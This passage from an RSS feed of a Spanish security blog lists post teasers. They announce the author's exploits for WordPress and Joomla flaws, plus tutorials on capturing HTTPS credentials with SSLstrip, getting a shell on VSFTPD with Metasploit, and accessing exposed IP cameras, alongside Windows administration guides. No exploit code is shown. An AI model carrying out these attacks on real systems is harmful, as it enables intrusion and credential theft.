los CMS y vengo a compartir con vosotros otro exploit que he desarrollado para la vulnerabilidad &lt;a href="https://www.certsi.es/alerta-temprana/vulnerabilidades/cve-2018-6389" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6389&lt;/a&gt;
. Esta vulnerabilidad descubierta por &lt;a href="http://baraktawily.blogspot.com.es/" target="_blank" rel="noopener noreferrer"&gt;Barak Tawily&lt;/a&gt;
, permite lanzar un &lt;a href="https://es.wikipedia.org/wiki/Ataque_de_denegaci%C3%B3n_de_servicio" target="_blank" rel="noopener noreferrer"&gt;ataque de denegación de servicio (DOS)&lt;/a&gt;
 sobre las páginas webs desarrolladas con WordPress (se estima que &lt;strong&gt;aproximadamente el 29% de todas las webs que existen actualmente&lt;/strong&gt; en el mundo están desarrolladas con este framework).&lt;/p&gt;</description></item><item><title>Exploit CVE-2018-6396 - Joomla Google Map Landkarten SQL Injection</title><link>https://hackpuntes.com/es/posts/exploit-cve-2018-6396-joomla-google-map-landkarten-sql-injection/</link><pubDate>Sun, 04 Mar 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploit-cve-2018-6396-joomla-google-map-landkarten-sql-injection/</guid><description>&lt;p&gt;Hoy quería compartir con vosotros un &lt;a href="https://es.wikipedia.org/wiki/Exploit" target="_blank" rel="noopener noreferrer"&gt;exploit&lt;/a&gt;
 que he desarrollado en Python para explotar una vulnerabilidad SQLi descubierta por &lt;a href="https://twitter.com/ihsansencan" target="_blank" rel="noopener noreferrer"&gt;Ihsan Sencan&lt;/a&gt;
 en el componente &lt;a href="https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/" target="_blank" rel="noopener noreferrer"&gt;Google Map Landkarten&lt;/a&gt;
, esta vulnerabilidad tiene asociado el &lt;a href="https://www.certsi.es/en/early-warning/vulnerabilities/cve-2018-6396" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6396.&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="joomla-cve-2018-6396"&gt;Joomla CVE-2018-6396&lt;/h2&gt;
&lt;h3 id="joomla-component-google-map-landkarten--423--sql-injection"&gt;Joomla! Component Google Map Landkarten &amp;lt;= 4.2.3 – SQL Injection&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por &lt;a href="https://www.exploit-db.com/exploits/44113/" target="_blank" rel="noopener noreferrer"&gt;Ihsan Sencan&lt;/a&gt;
 el &lt;strong&gt;16/02/2018&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;💣 Exploit desarrollado por &lt;a href="https://twitter.com/JJavierOlmedo" target="_blank" rel="noopener noreferrer"&gt;Javier Olmedo&lt;/a&gt;
 el &lt;strong&gt;03/03/2018&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://www.certsi.es/en/early-warning/vulnerabilities/cve-2018-6396" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6396&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software  &lt;a href="https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/" target="_blank" rel="noopener noreferrer"&gt;Google Map Landkarten&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable &amp;lt;= &lt;strong&gt;4.2.3&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cómo-usar-este-exploit"&gt;¿Cómo usar este exploit?&lt;/h3&gt;
&lt;p&gt;En primer lugar, &lt;strong&gt;usa este exploit únicamente sobre sitios web administrados por ti o en los cuales tengas consentimiento&lt;/strong&gt; para realizar está comprobación, en mi caso, me he creado una web con &lt;a href="https://downloads.joomla.org/es/" target="_blank" rel="noopener noreferrer"&gt;Joomla 3.8.5&lt;/a&gt;
 en mi máquina local.&lt;/p&gt;</description></item><item><title>WordPress Exploit FrameWork (WPXF) - Instalación, comandos y uso con ejemplo de explotación</title><link>https://hackpuntes.com/es/posts/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/</link><pubDate>Fri, 05 Jan 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion_banner.webp" alt="WordPress Exploit FrameWork (WPXF) - Instalación, comandos y uso con ejemplo de explotación" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;WordPress Exploit FrameWork es una herramienta que sirve de ayuda a los auditores de aplicaciones web a la hora realizar &lt;strong&gt;pruebas de seguridad sobre sitios webs basados en el conocido gestor de contenidos (CMS) WordPress&lt;/strong&gt;, está desarrollado en Ruby y está orientado al uso y desarrollo de módulos, exploits y payloads, algo similar al conocido Metasploit.&lt;/p&gt;</description></item><item><title>Instalación de Mozilla Firefox Quantum en Kali Linux</title><link>https://hackpuntes.com/es/posts/instalacion-de-mozilla-firefox-quantum-en-kali-linux/</link><pubDate>Tue, 12 Dec 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/instalacion-de-mozilla-firefox-quantum-en-kali-linux/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/instalacion-de-mozilla-firefox-quantum-en-kali-linux/instalacion-de-mozilla-firefox-quantum-en-kali-linux_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/instalacion-de-mozilla-firefox-quantum-en-kali-linux/instalacion-de-mozilla-firefox-quantum-en-kali-linux_banner.webp" alt="Instalación de Mozilla Firefox Quantum en Kali Linux" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En esta entrada, veremos &lt;strong&gt;como instalar Firefox Quantum en Kali Linux&lt;/strong&gt; y otras distribuciones basadas en Debian.&lt;/p&gt;
&lt;p&gt;Firefox Quantum es el nuevo navegador de Mozilla, &lt;strong&gt;mucho más rápido&lt;/strong&gt; que su antecesor y con un &lt;strong&gt;nuevo motor&lt;/strong&gt; con lo último en tecnología para navegadores.&lt;/p&gt;
&lt;h2 id="pasos-a-seguir-para-su-instalación"&gt;Pasos a seguir para su instalación&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Descargamos&lt;/strong&gt; Firefox Quantum desde su web oficial &lt;a href="https://www.mozilla.org/es-ES/firefox/" target="_blank" rel="noopener noreferrer"&gt;https://www.mozilla.org/es-ES/firefox/&lt;/a&gt;
&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Una vez descargado, &lt;strong&gt;botón derecho&lt;/strong&gt; y extraemos los archivos, también podemos descomprimir con el comando &lt;strong&gt;tar&lt;/strong&gt;, de la siguiente manera:&lt;/p&gt;</description></item><item><title>ESET Remote Administrator (ERA) - Parte II: Instalar Agente ERA mediante tarea</title><link>https://hackpuntes.com/es/posts/eset-remote-administrator-era-parte-ii-instalar-agente-era-mediante-tarea/</link><pubDate>Tue, 14 Nov 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/eset-remote-administrator-era-parte-ii-instalar-agente-era-mediante-tarea/</guid><description>&lt;p&gt;Buenas a todos, en esta entrada sobre ESET Remote Administrator (ERA) vamos a ver como &lt;strong&gt;instalar el Agente ERA en los equipos mediante una tarea&lt;/strong&gt;, a través del agente, podremos administrar los equipos, por ejemplo, después de tenerlo configurado en los equipos comenzaremos a instalar la solución antivirus ESET EndPoint Security &lt;strong&gt;mediante otra tarea y de manera desatendida&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;En mi caso tengo instalado ERA en la siguiente dirección &lt;a href="https://192.168.100.10/era" target="_blank" rel="noopener noreferrer"&gt;https://192.168.100.10/era&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/eset-remote-administrator-era-parte-ii-instalar-agente-era-mediante-tarea/eset-remote-administrator-era-parte-ii-instalar-agente-era-mediante-tarea_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/eset-remote-administrator-era-parte-ii-instalar-agente-era-mediante-tarea/eset-remote-administrator-era-parte-ii-instalar-agente-era-mediante-tarea_001.webp" alt="ESET Remote Administrator (ERA) - Parte II: Instalar Agente ERA mediante tarea" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ESET Remote Administrator (ERA) - Parte I: Instalación</title><link>https://hackpuntes.com/es/posts/eset-remote-administrator-era-parte-i-instalacion/</link><pubDate>Wed, 08 Nov 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/eset-remote-administrator-era-parte-i-instalacion/</guid><description>&lt;p&gt;Ya hemos visto en &lt;a href="https://hackpuntes.com/wsus-windows-server-update-services-instalacion-y-configuracion-parte-i/"&gt;entradas anteriores&lt;/a&gt;
como mantener nuestros equipos del dominio con las últimas actualizaciones críticas y parches de seguridad para mantenerlos más seguros, otra de las tareas prioritarias que debemos de hacer, es &lt;strong&gt;proveer de una solución antivirus a los equipos&lt;/strong&gt;, en esta entrada, veremos cómo instalar &lt;strong&gt;ERA (ESET Remote Administrator)&lt;/strong&gt; en un controlador de dominio con Windows Server 2016.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/eset-remote-administrator-era-parte-i-instalacion/eset-remote-administrator-era-parte-i-instalacion_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/eset-remote-administrator-era-parte-i-instalacion/eset-remote-administrator-era-parte-i-instalacion_001.webp" alt="ESET Remote Administrator (ERA) - Parte I: Instalación" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Crear una GPO para bloquear la sesión de usuario por inactividad</title><link>https://hackpuntes.com/es/posts/crear-una-gpo-para-bloquear-la-sesion-de-usuario-por-inactividad/</link><pubDate>Mon, 06 Nov 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/crear-una-gpo-para-bloquear-la-sesion-de-usuario-por-inactividad/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/crear-una-gpo-para-bloquear-la-sesion-de-usuario-por-inactividad/crear-una-gpo-para-bloquear-la-sesion-de-usuario-por-inactividad_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/crear-una-gpo-para-bloquear-la-sesion-de-usuario-por-inactividad/crear-una-gpo-para-bloquear-la-sesion-de-usuario-por-inactividad_banner.webp" alt="Crear una GPO para bloquear la sesión de usuario por inactividad" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En algunas ocasiones, los usuarios, por olvido, &lt;strong&gt;pueden dejar su sesión abierta&lt;/strong&gt; mientras se ausentan de su puesto, esto puede implicar que un tercero acceda a información o a aplicaciones sin autorización.
En esta entrada vamos a &lt;strong&gt;configurar una GPO&lt;/strong&gt; (Directiva de grupo) para que se bloquee su sesión pasados 5 minutos y sea necesario volver a introducir la contraseña de usuario.&lt;/p&gt;</description></item><item><title>WSUS (Windows Server Update Services): Reportes y uso - Parte III</title><link>https://hackpuntes.com/es/posts/wsus-windows-server-update-services-reportes-y-uso-parte-iii/</link><pubDate>Thu, 02 Nov 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/wsus-windows-server-update-services-reportes-y-uso-parte-iii/</guid><description>&lt;p&gt;Última entrada sobre WSUS, esta vez &lt;strong&gt;hablaremos sobre el uso de la consola y la generación de reportes&lt;/strong&gt;, si aún no has leído las entradas anteriores, te dejo por aquí la &lt;a href="https://hackpuntes.com/wsus-windows-server-update-services-instalacion-y-configuracion-parte-i/"&gt;primera entrada&lt;/a&gt;
dónde hablo sobre la instalación y la &lt;a href="https://hackpuntes.com/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/"&gt;segunda entrada&lt;/a&gt;
sobre la creación de una política.&lt;/p&gt;
&lt;p&gt;Lo primero que nos encontramos al intentar generar un reporte con la consola de WSUS, es un error de una característica no disponible, en concreto &lt;strong&gt;“Microsoft Report Viewer 2012 Redistributalbe”&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>WSUS (Windows Server Update Services): Configuración de política - Parte II</title><link>https://hackpuntes.com/es/posts/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/</link><pubDate>Fri, 27 Oct 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/</guid><description>&lt;p&gt;Seguimos con la &lt;strong&gt;segunda parte sobre WSUS (Windows Server Update Services)&lt;/strong&gt;, en esta entrada vamos a ver como &lt;strong&gt;crear una política en el dominio para aplicar a los equipos&lt;/strong&gt; clientes, si no has empezado esta serie de entradas, &lt;a href="https://hackpuntes.com/wsus-windows-server-update-services-instalacion-y-configuracion-parte-i/"&gt;puedes ver la primera parte&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="crear-política-para-equipos-clientes"&gt;Crear política para equipos clientes&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Abrimos &lt;strong&gt;“Administración de directivas de grupo”&lt;/strong&gt;, en &lt;strong&gt;“Herramientas”&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/wsus-windows-server-update-services-configuracion-de-politica-parte-ii_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/wsus-windows-server-update-services-configuracion-de-politica-parte-ii_001.webp" alt="WSUS (Windows Server Update Services): Configuración de política - Parte II" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ol start="2"&gt;
&lt;li&gt;En mi caso, &lt;strong&gt;tengo creada una unidad organizativa&lt;/strong&gt; dentro de &lt;strong&gt;«Usuarios y equipos del Active directory»&lt;/strong&gt; para ubicar todos los equipos clientes del dominio, &lt;strong&gt;«Click derecho»&lt;/strong&gt; y &lt;strong&gt;«Crear una GPO en este dominio y vincularlo aquí»&lt;/strong&gt;, ponemos un nombre y aceptamos.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/wsus-windows-server-update-services-configuracion-de-politica-parte-ii_002.webp"&gt;&lt;img src="https://hackpuntes.com/images/wsus-windows-server-update-services-configuracion-de-politica-parte-ii/wsus-windows-server-update-services-configuracion-de-politica-parte-ii_002.webp" alt="WSUS (Windows Server Update Services): Configuración de política - Parte II" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>WSUS (Windows Server Update Services): Instalación y configuración - Parte I</title><link>https://hackpuntes.com/es/posts/wsus-windows-server-update-services-instalacion-y-configuracion-parte-i/</link><pubDate>Tue, 24 Oct 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/wsus-windows-server-update-services-instalacion-y-configuracion-parte-i/</guid><description>&lt;p&gt;Buenas a todos, voy a comenzar una &lt;strong&gt;serie de entradas en el blog&lt;/strong&gt; dónde explicaré como &lt;strong&gt;implementar WSUS&lt;/strong&gt; (Windows Server Update Services) en un dominio con Windows Server 2016 para mantener nuestros equipos de la empresa actualizados y más seguros, en un principio, creo que con &lt;strong&gt;3 entradas podré explicar lo necesario&lt;/strong&gt; para tener este rol completamente funcional.&lt;/p&gt;
&lt;p&gt;En esta entrada os explicaré un poco en qué consiste WSUS, su &lt;strong&gt;instalación y configuración&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>KRACK (Key Reinstallation Attacks): El ataque que vulnera el protocolo WPA2 de las redes WiFi</title><link>https://hackpuntes.com/es/posts/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/</link><pubDate>Wed, 18 Oct 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi_banner.webp" alt="KRACK (Key Reinstallation Attacks): El ataque que vulnera el protocolo WPA2 de las redes WiFi" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ayer se hacía pública una de las noticias que más relevancia ha tenido en los últimos meses en el mundo de la ciberseguridad, el &lt;strong&gt;protocolo de seguridad WPA2&lt;/strong&gt;, usado en la mayoría de redes WiFi de todo el mundo &lt;strong&gt;ha sido roto (vulnerado)&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;El investigador Mathy Vanhoef (&lt;a href="https://x.com/vanhoefm" target="_blank" rel="noopener noreferrer"&gt;@vanhoefm&lt;/a&gt;
) de la Universidad KU de Leuven ha descubierto esta vulnerabilidad y lo ha puesto en conocimiento de la comunidad para que los fabricantes saquen parches para solucionarlo, algunas empresas como Microsoft se han dado prisa y &lt;a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2017-13080" target="_blank" rel="noopener noreferrer"&gt;ya han puesto una solución a sus productos&lt;/a&gt;
.&lt;/p&gt;</description></item><item><title>Metasploitable3: Crea una máquina vulnerable para probar tus ataques</title><link>https://hackpuntes.com/es/posts/metasploitable3-crea-una-maquina-vulnerable-para-probar-tus-ataques/</link><pubDate>Sun, 11 Jun 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/metasploitable3-crea-una-maquina-vulnerable-para-probar-tus-ataques/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/metasploitable3-crea-una-maquina-vulnerable-para-probar-tus-ataques/metasploitable3-crea-una-maquina-vulnerable-para-probar-tus-ataques_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/metasploitable3-crea-una-maquina-vulnerable-para-probar-tus-ataques/metasploitable3-crea-una-maquina-vulnerable-para-probar-tus-ataques_banner.webp" alt="Metasploitable3: Crea una máquina vulnerable para probar tus ataques" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="qué-es-metasploitable3-y-porqué-usarlo"&gt;¿Qué es Metasploitable3 y porqué usarlo?&lt;/h2&gt;
&lt;p&gt;Metasploitable3 es una &lt;strong&gt;máquina virtual gratuita de Windows Server 2008 que cuenta con varias vulnerabilidades&lt;/strong&gt; listas para ser explotadas y practicar nuestras técnicas de hacking o simular ataques, Metasploitable3 ha sido &lt;strong&gt;desarrollado por Rapid7&lt;/strong&gt;, los mismos &lt;strong&gt;desarrolladores&lt;/strong&gt; del conocido &lt;strong&gt;Framework MetaSploit&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Es &lt;strong&gt;usado por gran parte de la industria de la ciberseguridad&lt;/strong&gt; por varios motivos, cómo por ejemplo, la &lt;strong&gt;formación de personal&lt;/strong&gt; para la explotación de redes, &lt;strong&gt;pruebas de software&lt;/strong&gt; o demostración y &lt;strong&gt;viabilidad de ataques&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Script PowerShell para comprobar vulnerabilidad MS17-010</title><link>https://hackpuntes.com/es/posts/script-powershell-para-comprobar-vulnerabilidad-ms17-010/</link><pubDate>Tue, 16 May 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/script-powershell-para-comprobar-vulnerabilidad-ms17-010/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/script-powershell-para-comprobar-vulnerabilidad-ms17-010/script-powershell-para-comprobar-vulnerabilidad-ms17-010_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/script-powershell-para-comprobar-vulnerabilidad-ms17-010/script-powershell-para-comprobar-vulnerabilidad-ms17-010_banner.webp" alt="Script PowerShell para comprobar vulnerabilidad MS17-010" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Buenas a todos, después de estar mucho tiempo sin escribir en el blog, me gustaría compartir con vosotros un &lt;strong&gt;script&lt;/strong&gt; que he creado en PowerShell para &lt;strong&gt;comprobar la vulnerabilidad MS17-010&lt;/strong&gt; explotada por el ransomware WannaCry.&lt;/p&gt;
&lt;p&gt;Este script &lt;strong&gt;debe de ser ejecutado desde el controlador de dominio&lt;/strong&gt; para comprobar que equipos aún no cuentan con las actualizaciones publicadas por Microsoft para solucionar esta vulnerabilidad.&lt;/p&gt;</description></item><item><title>Obtener credenciales HTTPS con Bettercap y SSLstrip</title><link>https://hackpuntes.com/es/posts/obtener-credenciales-https-con-bettercap-y-sslstrip/</link><pubDate>Sun, 08 Jan 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/obtener-credenciales-https-con-bettercap-y-sslstrip/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/obtener-credenciales-https-con-bettercap-y-sslstrip/obtener-credenciales-https-con-bettercap-y-sslstrip_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/obtener-credenciales-https-con-bettercap-y-sslstrip/obtener-credenciales-https-con-bettercap-y-sslstrip_banner.webp" alt="Obtener credenciales HTTPS con Bettercap y SSLstrip" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Para empezar este 2017, os traigo un tutorial sobre &lt;strong&gt;cómo obtener las credenciales de sitios web que tengan cifrado SSL/TLS (HTTPS)&lt;/strong&gt; mediante una técnica llamada &lt;strong&gt;SSLstrip&lt;/strong&gt; y el uso de un &lt;strong&gt;framework para realizar ataques MITM&lt;/strong&gt; (ataque de hombre en el medio) llamado Bettercap, en Internet, existen multitud de tutoriales para realizar este ataque pero aquí os enseñaré como realizarlo de una manera muy simple.&lt;/p&gt;</description></item><item><title>Explotación de vulnerabilidad CVE-2011-0762 con Metasploit en VSFTPD v2.3.4</title><link>https://hackpuntes.com/es/posts/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/</link><pubDate>Thu, 20 Oct 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4_banner.webp" alt="Explotación de vulnerabilidad CVE-2011-0762 con Metasploit en VSFTPD v2.3.4" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En esta ocasión, os muestro como podemos &lt;strong&gt;explotar una vulnerabilidad con el Framework de seguridad Metasploit&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;En concreto explotaremos la vulnerabilidad &lt;strong&gt;CVE-2011-0762&lt;/strong&gt; en el servicio &lt;strong&gt;VSFTPD v2.3.4&lt;/strong&gt; para conseguir una shell e interactuar con el servidor vulnerado.&lt;/p&gt;
&lt;p&gt;Está vulnerabilidad &lt;strong&gt;tiene ya 5 años y es muy antigua&lt;/strong&gt;, aunque nos podemos seguir encontrando algún servidor que nos permita &lt;strong&gt;«jugar»&lt;/strong&gt;, la finalidad de esta entrada es aprender como usar los principales comandos de Metasploit.&lt;/p&gt;</description></item><item><title>Instalación de VirtualBox Guest Additions en Kali Linux 2016.2</title><link>https://hackpuntes.com/es/posts/instalacion-de-virtualbox-guest-additions-en-kali-linux-2016-2/</link><pubDate>Sat, 08 Oct 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/instalacion-de-virtualbox-guest-additions-en-kali-linux-2016-2/</guid><description>&lt;p&gt;Si eres de los que eliges &lt;strong&gt;VirtualBox&lt;/strong&gt; para trabajar con tus &lt;strong&gt;máquinas virtuales&lt;/strong&gt;, después de la instalación, habrás notado que el &lt;strong&gt;tamaño de la pantalla es muy reducido&lt;/strong&gt; e impide que podamos trabajar con ella cómodamente, otras veces, echamos de menos el poder &lt;strong&gt;integrar la máquina anfitrión con la virtual&lt;/strong&gt;, por ejemplo, algo tan simple como &lt;strong&gt;copiar un enlace o URL&lt;/strong&gt; con el atajo de tecla &lt;strong&gt;Ctrl + C&lt;/strong&gt; o &lt;strong&gt;arrastrar un archivo para usarlo en la máquina virtual&lt;/strong&gt;, para ello, VirtualBox tiene las llamadas &lt;strong&gt;Guest Additions&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Hacking Cámaras IP - Montándome mi propio Gran Hermano</title><link>https://hackpuntes.com/es/posts/hacking-camaras-ip-montandome-propio-gran-hermano/</link><pubDate>Sun, 11 Sep 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-camaras-ip-montandome-propio-gran-hermano/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hacking-camaras-ip-montandome-propio-gran-hermano/hacking-camaras-ip-montandome-propio-gran-hermano_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hacking-camaras-ip-montandome-propio-gran-hermano/hacking-camaras-ip-montandome-propio-gran-hermano_banner.webp" alt="Hacking Cámaras IP - Montándome mi propio Gran Hermano" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Para los que no os hayáis enterado, la &lt;strong&gt;edición 17 de Gran Hermano está a punto de comenzar&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="-y-si-me-monto-mi-propio-gran-hermano"&gt;¿ Y si me monto mi propio Gran Hermano?&lt;/h2&gt;
&lt;p&gt;Pues si, esa fue la pregunta que mi hice, y si &lt;strong&gt;tu también quieres montarte el tuyo&lt;/strong&gt;, te invito a que leas este tutorial sobre &lt;strong&gt;Hacking de cámaras IP&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;En esta entrada, os mostraré como podemos buscar Camarás IP accesibles desde Internet y cómo acceder a ellas.&lt;/p&gt;</description></item><item><title>Preparando Sublime Text 3 para programar en Python</title><link>https://hackpuntes.com/es/posts/preparando-sublime-text-3-programar-python/</link><pubDate>Tue, 28 Jun 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/preparando-sublime-text-3-programar-python/</guid><description>&lt;p&gt;Uno de los &lt;strong&gt;lenguajes de programación que más interés&lt;/strong&gt; ha despertado en el mundo de la &lt;strong&gt;Seguridad Informática y Hacking&lt;/strong&gt;, es sin duda &lt;strong&gt;Python&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Python es un &lt;strong&gt;lenguaje de programación interpretado y orientado a objetos&lt;/strong&gt;, muy &lt;strong&gt;fácil de aprender y potente&lt;/strong&gt;, desde mi punto de vista, recomendado para cualquier persona que desee &lt;strong&gt;aprender a programar&lt;/strong&gt;, y mucho más, si desea orientar sus conocimiento a la seguridad de la información, muchas de las herramientas de hacking que se usan hoy en día, están escritas en este lenguaje.&lt;/p&gt;</description></item><item><title>Navega por la Deep Web con Tails y un USB</title><link>https://hackpuntes.com/es/posts/navega-la-deep-web-tails-usb/</link><pubDate>Sun, 29 May 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/navega-la-deep-web-tails-usb/</guid><description>&lt;p&gt;Todo el mundo ha oído alguna vez hablar sobre la Deep Web, en la entrada de hoy, os mostraré como podemos &lt;strong&gt;crear un USB&lt;/strong&gt; para &lt;strong&gt;acceder a la Deep Web de manera segura, gratuita y anónima&lt;/strong&gt; con una distribución llamada &lt;strong&gt;Tails&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="que-es-la-deep-web"&gt;¿Que es la Deep Web?&lt;/h2&gt;
&lt;p&gt;La Deep Web, o &lt;strong&gt;también conocida como Internet profunda o invisible&lt;/strong&gt;, es la parte de Internet que &lt;strong&gt;no ha podido ser indexada por los motores de búsqueda&lt;/strong&gt;, ya sea por páginas privadas o material que ha sido ocultado, &lt;strong&gt;quedando así en mayor parte de manera inaccesible&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Cómo instalar Parrot OS en VMware</title><link>https://hackpuntes.com/es/posts/instalar-parrot-os-vmware/</link><pubDate>Sun, 17 Apr 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/instalar-parrot-os-vmware/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/instalar-parrot-os-vmware/instalar-parrot-os-vmware_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/instalar-parrot-os-vmware/instalar-parrot-os-vmware_banner.webp" alt="Cómo instalar Parrot OS en VMware" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
